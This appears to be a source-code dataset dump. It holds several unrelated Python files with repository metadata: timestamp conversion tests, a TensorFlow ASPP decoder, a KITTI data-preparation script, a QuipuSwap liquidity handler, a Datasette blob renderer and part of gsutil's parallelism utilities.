msg="{!r}.ts_to_sec_frac() == {!r}, expected {!r}".format(ts, ts_str, t[2]))
def test_convert_iso_utc(self):
"""This tests that conversion to and from ISO date format UTC time works as expected."""
tests = [
(Timestamp(1424177663, 102003), "2015-02-17T12:53:48.000102003Z"),
# the leap second is 23:59:60
# 30 June 1972 23:59:59 (2287785599, first time): TAI= UTC + 10 seconds
(Timestamp(78796809, 0), "1972-06-30T23:59:59.000000000Z"),
# 30 June 1972 23:59:60 (2287785599,second time): TAI= UTC + 11 seconds
(Timestamp(78796810, 0), "1972-06-30T23:59:60.000000000Z"),
# 1 July 1972 00:00:00 (2287785600) TAI= UTC + 11 seconds
(Timestamp(78796811, 0), "1972-07-01T00:00:00.000000000Z"),
(Timestamp(1341100833, 0), "2012-06-30T23:59:59.000000000Z"),
(Timestamp(1341100834, 0), "2012-06-30T23:59:60.000000000Z"),
(Timestamp(1341100835, 0), "2012-07-01T00:00:00.000000000Z"),
(Timestamp(1341100835, 1), "2012-07-01T00:00:00.000000001Z"),
(Timestamp(1341100835, 100000000), "2012-07-01T00:00:00.100000000Z"),
(Timestamp(1341100835, 999999999), "2012-07-01T00:00:00.999999999Z"),
(Timestamp(283996818, 0), "1979-01-01T00:00:00.000000000Z") # 1979
]
for t in tests:
utc = t[0].to_iso8601_utc()
self.assertEqual(utc, t[1])
ts = Timestamp.from_iso8601_utc(t[1])
self.assertEqual(ts, t[0])
bad_params = [
("2012-07-01Y00:00:00.000000001Z",),
("2012-07~01T00:00:00.000000001Z",),
("2012-07-01T00:00:00.0000.0001Z",),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp.from_iso8601_utc(*p)
def test_smpte_timelabel(self):
"""This tests that conversion to and from SMPTE time labels works correctly."""
tests = [
("2015-01-23T12:34:56F00 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F01 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F02 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F28 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:59F01 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:59F29 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:60F00 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:60F29 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T01:00:00F00 30000/1001 UTC+01:00 TAI-36", 30000, 1001, 60*60),
("2015-06-30T18:59:59F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T18:59:60F00 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T18:59:60F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T19:00:00F00 30000/1001 UTC-05:00 TAI-36", 30000, 1001, -5*60*60)
]
for t in tests:
ts = Timestamp.from_smpte_timelabel(t[0])
self.assertEqual(t[0], ts.to_smpte_timelabel(t[1], t[2], t[3]))
bad_params = [
("potato",),
("the quick brown fox jumps over the lazy dog",),
("",),
('\u3069\u3082\u3042\u308a\u304c\u3068\u3046\u3001\u30df\u30b9\u30bf\u30fc\u30fb\u30ed\u30dc\u30c8\u30fc',),
("About half nine on tuesday",),
("0315-13~35T25:63:60F56 50000/1002 UTC-25:35 TAY-2",),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp.from_smpte_timelabel(*p)
bad_params = [
(0, 1),
(1, 0),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp(0, 0).to_smpte_timelabel(*p)
with mock.patch("time.timezone", 0):
with mock.patch("time.localtime") as localtime:
localtime.return_value.tm_isdst = 1
ts = Timestamp.from_smpte_timelabel("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35")
self.assertEqual("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35",
ts.to_smpte_timelabel(30000, 1001))
def test_from_datetime(self):
"""Conversion from python's datetime object."""
tests = [
(datetime(1970, 1, 1, 0, 0, 0, 0, tz.gettz('UTC')), Timestamp(0, 0)),
(datetime(1983, 3, 29, 15, 45, 0, 0, tz.gettz('UTC')), Timestamp(417800721, 0)),
(datetime(2017, 12, 5, 16, 33, 12, 196, tz.gettz('UTC')), Timestamp(1512491629, 196000)),
]
for t in tests:
self.assertEqual(Timestamp.from_datetime(t[0]), t[1])
def test_to_datetime(self):
"""Conversion to python's datetime object."""
tests = [
(datetime(1970, 1, 1, 0, 0, 0, 0, tz.gettz('UTC')), Timestamp(0, 0)),
(datetime(1983, 3, 29, 15, 45, 0, 0, tz.gettz('UTC')), Timestamp(417800721, 0)),
(datetime(2017, 12, 5, 16, 33, 12, 196, tz.gettz('UTC')), Timestamp(1512491629, 196000)),
(datetime(2017, 12, 5, 16, 33, 13, 0, tz.gettz('UTC')), Timestamp(1512491629, 999999999)),
]
for t in tests:
self.assertEqual(t[0], t[1].to_datetime())
def test_from_str(self):
"""Conversion from string formats."""
tests = [
("2015-01-23T12:34:56F00 30000/1001 UTC-05:00 TAI-35", Timestamp(1422034531, 17100000)),
("2015-01-23T12:34:56.0Z", Timestamp(1422016531, 0)),
("now", Timestamp(0, 0)),
]
for t in tests:
with mock.patch("time.time", return_value=0.0):
self.assertEqual(Timestamp.from_str(t[0]), t[1])
def test_get_leap_seconds(self):
"""get_leap_seconds should return the correct number of leap seconds at any point in history."""
tests = [
(Timestamp(63072008, 999999999), 0),
(Timestamp(63072009, 0), 10),
(Timestamp(78796809, 999999999), 10),
(Timestamp(78796810, 0), 11),
(Timestamp(94694410, 999999999), 11),
(Timestamp(94694411, 0), 12),
(Timestamp(417800721, 0), 21),
(Timestamp(773020827, 999999999), 28),
(Timestamp(773020828, 0), 29),
(Timestamp(1512491629, 0), 37),
]
for t in tests:
self.assertEqual(t[0].get_leap_seconds(), t[1])
| 41.539235
| 120
| 0.531751
|
794b14bf5062e91e106ecbadae916020e74b701d
| 5,142
|
py
|
Python
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2017-10-26T06:23:51.000Z
|
2020-09-11T21:09:41.000Z
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2018-06-18T17:08:12.000Z
|
2021-04-12T05:39:04.000Z
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2020-04-11T19:31:17.000Z
|
2021-04-07T12:53:28.000Z
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains definitions of Atrous Spatial Pyramid Pooling (ASPP) decoder."""
# Import libraries
import tensorflow as tf
from official.vision import keras_cv
@tf.keras.utils.register_keras_serializable(package='Vision')
class ASPP(tf.keras.layers.Layer):
"""Creates an Atrous Spatial Pyramid Pooling (ASPP) layer."""
def __init__(self,
level,
dilation_rates,
num_filters=256,
pool_kernel_size=None,
use_sync_bn=False,
norm_momentum=0.99,
norm_epsilon=0.001,
activation='relu',
dropout_rate=0.0,
kernel_initializer='VarianceScaling',
kernel_regularizer=None,
interpolation='bilinear',
**kwargs):
"""Initializes an Atrous Spatial Pyramid Pooling (ASPP) layer.
Args:
level: An `int` level to apply ASPP.
dilation_rates: A `list` of dilation rates.
num_filters: An `int` number of output filters in ASPP.
pool_kernel_size: A `list` of [height, width] of pooling kernel size or
None. Pooling size is with respect to original image size, it will be
scaled down by 2**level. If None, global average pooling is used.
use_sync_bn: A `bool`. If True, use synchronized batch normalization.
norm_momentum: A `float` of normalization momentum for the moving average.
norm_epsilon: A `float` added to variance to avoid dividing by zero.
activation: A `str` activation to be used in ASPP.
dropout_rate: A `float` rate for dropout regularization.
kernel_initializer: A `str` name of kernel_initializer for convolutional
layers.
kernel_regularizer: A `tf.keras.regularizers.Regularizer` object for
Conv2D. Default is None.
interpolation: A `str` of interpolation method. It should be one of
`bilinear`, `nearest`, `bicubic`, `area`, `lanczos3`, `lanczos5`,
`gaussian`, or `mitchellcubic`.
**kwargs: Additional keyword arguments to be passed.
"""
super(ASPP, self).__init__(**kwargs)
self._config_dict = {
'level': level,
'dilation_rates': dilation_rates,
'num_filters': num_filters,
'pool_kernel_size': pool_kernel_size,
'use_sync_bn': use_sync_bn,
'norm_momentum': norm_momentum,
'norm_epsilon': norm_epsilon,
'activation': activation,
'dropout_rate': dropout_rate,
'kernel_initializer': kernel_initializer,
'kernel_regularizer': kernel_regularizer,
'interpolation': interpolation,
}
def build(self, input_shape):
pool_kernel_size = None
if self._config_dict['pool_kernel_size']:
pool_kernel_size = [
int(p_size // 2**self._config_dict['level'])
for p_size in self._config_dict['pool_kernel_size']
]
self.aspp = keras_cv.layers.SpatialPyramidPooling(
output_channels=self._config_dict['num_filters'],
dilation_rates=self._config_dict['dilation_rates'],
pool_kernel_size=pool_kernel_size,
use_sync_bn=self._config_dict['use_sync_bn'],
batchnorm_momentum=self._config_dict['norm_momentum'],
batchnorm_epsilon=self._config_dict['norm_epsilon'],
activation=self._config_dict['activation'],
dropout=self._config_dict['dropout_rate'],
kernel_initializer=self._config_dict['kernel_initializer'],
kernel_regularizer=self._config_dict['kernel_regularizer'],
interpolation=self._config_dict['interpolation'])
def call(self, inputs):
"""Calls the Atrous Spatial Pyramid Pooling (ASPP) layer on an input.
The output of ASPP will be a dict of {`level`, `tf.Tensor`} even if only one
level is present. Hence, this will be compatible with the rest of the
segmentation model interfaces.
Args:
inputs: A `dict` of `tf.Tensor` where
- key: A `str` of the level of the multilevel feature maps.
- values: A `tf.Tensor` of shape [batch, height_l, width_l,
filter_size].
Returns:
A `dict` of `tf.Tensor` where
- key: A `str` of the level of the multilevel feature maps.
- values: A `tf.Tensor` of output of ASPP module.
"""
outputs = {}
level = str(self._config_dict['level'])
outputs[level] = self.aspp(inputs[level])
return outputs
def get_config(self):
return self._config_dict
@classmethod
def from_config(cls, config, custom_objects=None):
return cls(**config)
| 39.860465
| 80
| 0.673668
|
794b14c7dbfa7f61b0c62b98f102325562f10495
| 12,173
|
py
|
Python
|
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
import copy
import pathlib
import pickle
import os
import fire
import numpy as np
from skimage import io as imgio
from second.core import box_np_ops
from second.core.point_cloud.point_cloud_ops import bound_points_jit
from second.data import kitti_common as kitti
from second.utils.progress_bar import list_bar as prog_bar
"""
Note: tqdm has problem in my system(win10), so use my progress bar
try:
from tqdm import tqdm as prog_bar
except ImportError:
from second.utils.progress_bar import progress_bar_iter as prog_bar
"""
def _read_imageset_file(path):
with open(path, 'r') as f:
lines = f.readlines()
return [int(line) for line in lines]
def _calculate_num_points_in_gt(data_path, infos, relative_path, remove_outside=True, num_features=4):
for info in infos:
if relative_path:
v_path = str(pathlib.Path(data_path) / info["velodyne_path"])
else:
v_path = info["velodyne_path"]
points_v = np.fromfile(
v_path, dtype=np.float32, count=-1).reshape([-1, num_features])
rect = info['calib/R0_rect']
Trv2c = info['calib/Tr_velo_to_cam']
P2 = info['calib/P2']
if remove_outside:
points_v = box_np_ops.remove_outside_points(points_v, rect, Trv2c, P2,
info["img_shape"])
# points_v = points_v[points_v[:, 0] > 0]
annos = info['annos']
num_obj = len([n for n in annos['name'] if n != 'DontCare'])
# annos = kitti.filter_kitti_anno(annos, ['DontCare'])
dims = annos['dimensions'][:num_obj]
loc = annos['location'][:num_obj]
rots = annos['rotation_y'][:num_obj]
gt_boxes_camera = np.concatenate(
[loc, dims, rots[..., np.newaxis]], axis=1)
gt_boxes_lidar = box_np_ops.box_camera_to_lidar(
gt_boxes_camera, rect, Trv2c)
indices = box_np_ops.points_in_rbbox(points_v[:, :3], gt_boxes_lidar)
num_points_in_gt = indices.sum(0)
num_ignored = len(annos['dimensions']) - num_obj
num_points_in_gt = np.concatenate(
[num_points_in_gt, -np.ones([num_ignored])])
annos["num_points_in_gt"] = num_points_in_gt.astype(np.int32)
def create_kitti_info_file(data_path,
save_path=None,
create_trainval=False,
relative_path=True):
train_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "train.txt"))
val_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "val.txt"))
trainval_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "trainval.txt"))
test_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "test.txt"))
print("Generate info. this may take several minutes.")
if save_path is None:
save_path = pathlib.Path(data_path)
else:
save_path = pathlib.Path(save_path)
kitti_infos_train = kitti.get_kitti_image_info(
data_path,
training=True,
velodyne=True,
calib=True,
image_ids=train_img_ids,
relative_path=relative_path)
_calculate_num_points_in_gt(data_path, kitti_infos_train, relative_path)
filename = save_path / 'kitti_infos_train.pkl'
print(f"Kitti info train file is saved to {filename}")
with open(filename, 'wb') as f:
pickle.dump(kitti_infos_train, f)
kitti_infos_val = kitti.get_kitti_image_info(
data_path,
training=True,
velodyne=True,
calib=True,
image_ids=val_img_ids,
relative_path=relative_path)
_calculate_num_points_in_gt(data_path, kitti_infos_val, relative_path)
filename = save_path / 'kitti_infos_val.pkl'
print(f"Kitti info val file is saved to {filename}")
with open(filename, 'wb') as f:
pickle.dump(kitti_infos_val, f)
"""
if create_trainval:
kitti_infos_trainval = kitti.get_kitti_image_info(
data_path,
training=True,
velodyne=True,
calib=True,
image_ids=trainval_img_ids,
relative_path=relative_path)
filename = save_path / 'kitti_infos_trainval.pkl'
print(f"Kitti info trainval file is saved to {filename}")
with open(filename, 'wb') as f:
pickle.dump(kitti_infos_trainval, f)
"""
filename = save_path / 'kitti_infos_trainval.pkl'
print(f"Kitti info trainval file is saved to {filename}")
with open(filename, 'wb') as f:
pickle.dump(kitti_infos_train + kitti_infos_val, f)
kitti_infos_test = kitti.get_kitti_image_info(
data_path,
training=False,
label_info=False,
velodyne=True,
calib=True,
image_ids=test_img_ids,
relative_path=relative_path)
filename = save_path / 'kitti_infos_test.pkl'
print(f"Kitti info test file is saved to {filename}")
with open(filename, 'wb') as f:
pickle.dump(kitti_infos_test, f)
def _create_reduced_point_cloud(data_path,
info_path,
save_path=None,
back=False):
with open(info_path, 'rb') as f:
kitti_infos = pickle.load(f)
for info in prog_bar(kitti_infos):
v_path = info['velodyne_path']
v_path = pathlib.Path(data_path) / v_path
points_v = np.fromfile(
str(v_path), dtype=np.float32, count=-1).reshape([-1, 4])
rect = info['calib/R0_rect']
P2 = info['calib/P2']
Trv2c = info['calib/Tr_velo_to_cam']
# first remove z < 0 points
# keep = points_v[:, -1] > 0
# points_v = points_v[keep]
# then remove outside.
if back:
points_v[:, 0] = -points_v[:, 0]
points_v = box_np_ops.remove_outside_points(points_v, rect, Trv2c, P2,
info["img_shape"])
if save_path is None:
save_filename = v_path.parent.parent / (v_path.parent.stem + "_reduced") / v_path.name
# save_filename = str(v_path) + '_reduced'
if back:
save_filename += "_back"
else:
save_filename = str(pathlib.Path(save_path) / v_path.name)
if back:
save_filename += "_back"
with open(save_filename, 'w') as f:
points_v.tofile(f)
def create_reduced_point_cloud(data_path,
train_info_path=None,
val_info_path=None,
test_info_path=None,
save_path=None,
with_back=False):
if train_info_path is None:
train_info_path = pathlib.Path(data_path) / 'kitti_infos_train.pkl'
if val_info_path is None:
val_info_path = pathlib.Path(data_path) / 'kitti_infos_val.pkl'
if test_info_path is None:
test_info_path = pathlib.Path(data_path) / 'kitti_infos_test.pkl'
_create_reduced_point_cloud(data_path, train_info_path, save_path)
_create_reduced_point_cloud(data_path, val_info_path, save_path)
_create_reduced_point_cloud(data_path, test_info_path, save_path)
if with_back:
_create_reduced_point_cloud(
data_path, train_info_path, save_path, back=True)
_create_reduced_point_cloud(
data_path, val_info_path, save_path, back=True)
_create_reduced_point_cloud(
data_path, test_info_path, save_path, back=True)
def create_groundtruth_database(data_path,
info_path=None,
used_classes=None,
database_save_path=None,
db_info_save_path=None,
relative_path=True,
lidar_only=False,
bev_only=False,
coors_range=None):
root_path = pathlib.Path(data_path)
if info_path is None:
info_path = root_path / 'kitti_infos_train.pkl'
if database_save_path is None:
database_save_path = root_path / 'gt_database'
else:
database_save_path = pathlib.Path(database_save_path)
if db_info_save_path is None:
db_info_save_path = root_path / "kitti_dbinfos_train.pkl"
database_save_path.mkdir(parents=True, exist_ok=True)
with open(info_path, 'rb') as f:
kitti_infos = pickle.load(f)
all_db_infos = {}
if used_classes is None:
used_classes = list(kitti.get_classes())
used_classes.pop(used_classes.index('DontCare'))
for name in used_classes:
all_db_infos[name] = []
group_counter = 0
for info in prog_bar(kitti_infos):
velodyne_path = info['velodyne_path']
if relative_path:
# velodyne_path = str(root_path / velodyne_path) + "_reduced"
velodyne_path = str(root_path / velodyne_path)
num_features = 4
if 'pointcloud_num_features' in info:
num_features = info['pointcloud_num_features']
points = np.fromfile(
velodyne_path, dtype=np.float32, count=-1).reshape([-1, num_features])
image_idx = info["image_idx"]
rect = info['calib/R0_rect']
P2 = info['calib/P2']
Trv2c = info['calib/Tr_velo_to_cam']
if not lidar_only:
points = box_np_ops.remove_outside_points(points, rect, Trv2c, P2,
info["img_shape"])
annos = info["annos"]
names = annos["name"]
bboxes = annos["bbox"]
difficulty = annos["difficulty"]
gt_idxes = annos["index"]
num_obj = np.sum(annos["index"] >= 0)
rbbox_cam = kitti.anno_to_rbboxes(annos)[:num_obj]
rbbox_lidar = box_np_ops.box_camera_to_lidar(rbbox_cam, rect, Trv2c)
if bev_only: # set z and h to limits
assert coors_range is not None
rbbox_lidar[:, 2] = coors_range[2]
rbbox_lidar[:, 5] = coors_range[5] - coors_range[2]
group_dict = {}
group_ids = np.full([bboxes.shape[0]], -1, dtype=np.int64)
if "group_ids" in annos:
group_ids = annos["group_ids"]
else:
group_ids = np.arange(bboxes.shape[0], dtype=np.int64)
point_indices = box_np_ops.points_in_rbbox(points, rbbox_lidar)
for i in range(num_obj):
filename = f"{image_idx}_{names[i]}_{gt_idxes[i]}.bin"
filepath = database_save_path / filename
gt_points = points[point_indices[:, i]]
gt_points[:, :3] -= rbbox_lidar[i, :3]
with open(filepath, 'w') as f:
gt_points.tofile(f)
if names[i] in used_classes:
if relative_path:
db_path = str(database_save_path.stem + "/" + filename)
else:
db_path = str(filepath)
db_info = {
"name": names[i],
"path": db_path,
"image_idx": image_idx,
"gt_idx": gt_idxes[i],
"box3d_lidar": rbbox_lidar[i],
"num_points_in_gt": gt_points.shape[0],
"difficulty": difficulty[i],
# "group_id": -1,
# "bbox": bboxes[i],
}
local_group_id = group_ids[i]
# if local_group_id >= 0:
if local_group_id not in group_dict:
group_dict[local_group_id] = group_counter
group_counter += 1
db_info["group_id"] = group_dict[local_group_id]
if "score" in annos:
db_info["score"] = annos["score"][i]
all_db_infos[names[i]].append(db_info)
for k, v in all_db_infos.items():
print(f"load {len(v)} {k} database infos")
with open(db_info_save_path, 'wb') as f:
pickle.dump(all_db_infos, f)
if __name__ == '__main__':
fire.Fire()
| 39.911475
| 102
| 0.592787
|
794b153ddf01c74ae99c09cb5f5d75dc61825e21
| 1,732
|
py
|
Python
|
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
import quipuswap.models as models
from quipuswap.types.fa12_token.parameter.transfer import TransferParameter
from quipuswap.types.fa12_token.storage import Fa12TokenStorage
from quipuswap.types.quipu_fa12.parameter.invest_liquidity import (
InvestLiquidityParameter,
)
from quipuswap.types.quipu_fa12.storage import QuipuFa12Storage
from dipdup.context import HandlerContext
from dipdup.models import Transaction
async def on_fa12_invest_liquidity(
ctx: HandlerContext,
invest_liquidity: Transaction[InvestLiquidityParameter, QuipuFa12Storage],
transfer: Transaction[TransferParameter, Fa12TokenStorage],
) -> None:
storage = invest_liquidity.storage
decimals = int(ctx.template_values["decimals"])
symbol = ctx.template_values["symbol"]
trader = invest_liquidity.data.sender_address
position, _ = await models.Position.get_or_create(trader=trader, symbol=symbol)
assert invest_liquidity.data.amount is not None
tez_qty = Decimal(invest_liquidity.data.amount) / (10**6)
token_qty = Decimal(transfer.parameter.value) / (10**decimals)
new_shares_qty = int(storage.storage.ledger[trader].balance) + int(storage.storage.ledger[trader].frozen_balance) # type: ignore
price = (Decimal(storage.storage.tez_pool) / (10**6)) / (
Decimal(storage.storage.token_pool) / (10**decimals)
)
value = tez_qty + price * token_qty
share_px = value / (new_shares_qty - position.shares_qty)
assert share_px > 0, invest_liquidity.data.hash
position.avg_share_px = (
position.shares_qty * position.avg_share_px + value
) / new_shares_qty
position.shares_qty = new_shares_qty # type: ignore
await position.save()
| 38.488889
| 133
| 0.762702
|
794b153e3c8ddb7fc6d2539cdbd8fd94fe60ccdd
| 1,926
|
py
|
Python
|
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | 1
|
2020-11-03T17:40:11.000Z
|
2020-11-03T17:40:11.000Z
|
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | null | null | null |
datasette/blob_renderer.py
|
Quentinchampenois/datasette
|
13d1228d80c91d382a05b1a9549ed02c300ef851
|
[
"Apache-2.0"
] | null | null | null |
from datasette import hookimpl
from datasette.utils.asgi import Response, BadRequest
from datasette.utils import to_css_class
import hashlib
_BLOB_COLUMN = "_blob_column"
_BLOB_HASH = "_blob_hash"
async def render_blob(datasette, database, rows, columns, request, table, view_name):
if _BLOB_COLUMN not in request.args:
raise BadRequest("?{}= is required".format(_BLOB_COLUMN))
blob_column = request.args[_BLOB_COLUMN]
if blob_column not in columns:
raise BadRequest("{} is not a valid column".format(blob_column))
# If ?_blob_hash= provided, use that to select the row - otherwise use first row
blob_hash = None
if _BLOB_HASH in request.args:
blob_hash = request.args[_BLOB_HASH]
for row in rows:
value = row[blob_column]
if hashlib.sha256(value).hexdigest() == blob_hash:
break
else:
# Loop did not break
raise BadRequest(
"Link has expired - the requested binary content has changed or could not be found."
)
else:
row = rows[0]
value = row[blob_column]
filename_bits = []
if table:
filename_bits.append(to_css_class(table))
if "pk_path" in request.url_vars:
filename_bits.append(request.url_vars["pk_path"])
filename_bits.append(to_css_class(blob_column))
if blob_hash:
filename_bits.append(blob_hash[:6])
filename = "-".join(filename_bits) + ".blob"
headers = {
"X-Content-Type-Options": "nosniff",
"Content-Disposition": 'attachment; filename="{}"'.format(filename),
}
return Response(
body=value or b"",
status=200,
headers=headers,
content_type="application/binary",
)
@hookimpl
def register_output_renderer():
return {
"extension": "blob",
"render": render_blob,
"can_render": lambda: False,
}
| 31.064516
| 100
| 0.641745
|
794b15b0e7149528568a3fb643c35c8f477c9fe5
| 13,761
|
py
|
Python
|
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
gslib/utils/parallelism_framework_util.py
|
zakrywilson/gsutil
|
e13bdb44341361a67e43828aabd00999dc74d05d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility classes and methods for the parallelism framework."""
from __future__ import absolute_import
from __future__ import print_function
import collections
import multiprocessing
import threading
import traceback
from six.moves import queue as Queue
import gslib
from gslib.utils import constants
from gslib.utils import system_util
# pylint: disable=g-import-not-at-top
try:
# This module doesn't necessarily exist on Windows.
import resource
_HAS_RESOURCE_MODULE = True
except ImportError, e:
_HAS_RESOURCE_MODULE = False
# Maximum time to wait (join) on the SeekAheadThread after the ProducerThread
# completes, in seconds.
SEEK_AHEAD_JOIN_TIMEOUT = 60
# Timeout for puts/gets to the global status queue, in seconds.
STATUS_QUEUE_OP_TIMEOUT = 5
# Maximum time to wait (join) on the UIThread after the Apply
# completes, in seconds.
UI_THREAD_JOIN_TIMEOUT = 60
ZERO_TASKS_TO_DO_ARGUMENT = ('There were no', 'tasks to do')
# Multiprocessing manager used to coordinate across all processes. This
# attribute is only present if multiprocessing is available, which can be
# determined by calling CheckMultiprocessingAvailableAndInit().
global top_level_manager # pylint: disable=global-at-module-level
# Cache the values from this check such that they're available to all callers
# without needing to run all the checks again (some of these, such as calling
# multiprocessing.Manager(), are expensive operations).
_cached_multiprocessing_is_available = None
_cached_multiprocessing_check_stack_trace = None
_cached_multiprocessing_is_available_message = None
# This must be defined at the module level for pickling across processes.
MultiprocessingIsAvailableResult = collections.namedtuple(
'MultiprocessingIsAvailableResult', ['is_available', 'stack_trace'])
class AtomicDict(object):
"""Thread-safe (and optionally process-safe) dictionary protected by a lock.
If a multiprocessing.Manager is supplied on init, the dictionary is
both process and thread safe. Otherwise, it is only thread-safe.
"""
def __init__(self, manager=None):
"""Initializes the dict.
Args:
manager: (multiprocessing.Manager or None) Manager instance (required for
cross-process safety), or none if cross-process safety is not needed.
"""
if manager:
self.lock = manager.Lock()
self.dict = manager.dict()
else:
self.lock = threading.Lock()
self.dict = {}
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __setitem__(self, key, value):
with self.lock:
self.dict[key] = value
# pylint: disable=invalid-name
def get(self, key, default_value=None):
with self.lock:
return self.dict.get(key, default_value)
def delete(self, key):
with self.lock:
del self.dict[key]
def values(self):
with self.lock:
return self.dict.values()
def Increment(self, key, inc, default_value=0):
"""Atomically updates the stored value associated with the given key.
Performs the atomic equivalent of
dict[key] = dict.get(key, default_value) + inc.
Args:
key: lookup key for the value of the first operand of the "+" operation.
inc: Second operand of the "+" operation.
default_value: Default value if there is no existing value for the key.
Returns:
Incremented value.
"""
with self.lock:
val = self.dict.get(key, default_value) + inc
self.dict[key] = val
return val
class ProcessAndThreadSafeInt(object):
"""This class implements a process and thread-safe integer.
It is backed either by a multiprocessing Value of type 'i' or an internal
threading lock. This simplifies the calling pattern for
global variables that could be a Multiprocessing.Value or an integer.
Without this class, callers need to write code like this:
global variable_name
if isinstance(variable_name, int):
return variable_name
else:
return variable_name.value
"""
def __init__(self, multiprocessing_is_available):
self.multiprocessing_is_available = multiprocessing_is_available
if self.multiprocessing_is_available:
# Lock is implicit in multiprocessing.Value
self.value = multiprocessing.Value('i', 0)
else:
self.lock = threading.Lock()
self.value = 0
def Reset(self, reset_value=0):
if self.multiprocessing_is_available:
self.value.value = reset_value
else:
with self.lock:
self.value = reset_value
def Increment(self):
if self.multiprocessing_is_available:
self.value.value += 1
else:
with self.lock:
self.value += 1
def Decrement(self):
if self.multiprocessing_is_available:
self.value.value -= 1
else:
with self.lock:
self.value -= 1
def GetValue(self):
if self.multiprocessing_is_available:
return self.value.value
else:
with self.lock:
return self.value
def _IncreaseSoftLimitForResource(resource_name, fallback_value):
"""Sets a new soft limit for the maximum number of open files.
The soft limit is used for this process (and its children), but the
hard limit is set by the system and cannot be exceeded.
We will first try to set the soft limit to the hard limit's value; if that
fails, we will try to set the soft limit to the fallback_value iff this would
increase the soft limit.
Args:
resource_name: Name of the resource to increase the soft limit for.
fallback_value: Fallback value to be used if we couldn't set the
soft value to the hard value (e.g., if the hard value
is "unlimited").
Returns:
Current soft limit for the resource (after any changes we were able to
make), or -1 if the resource doesn't exist.
"""
# Get the value of the resource.
try:
(soft_limit, hard_limit) = resource.getrlimit(resource_name)
except (resource.error, ValueError):
# The resource wasn't present, so we can't do anything here.
return -1
# Try to set the value of the soft limit to the value of the hard limit.
if hard_limit > soft_limit: # Some OS's report 0 for "unlimited".
try:
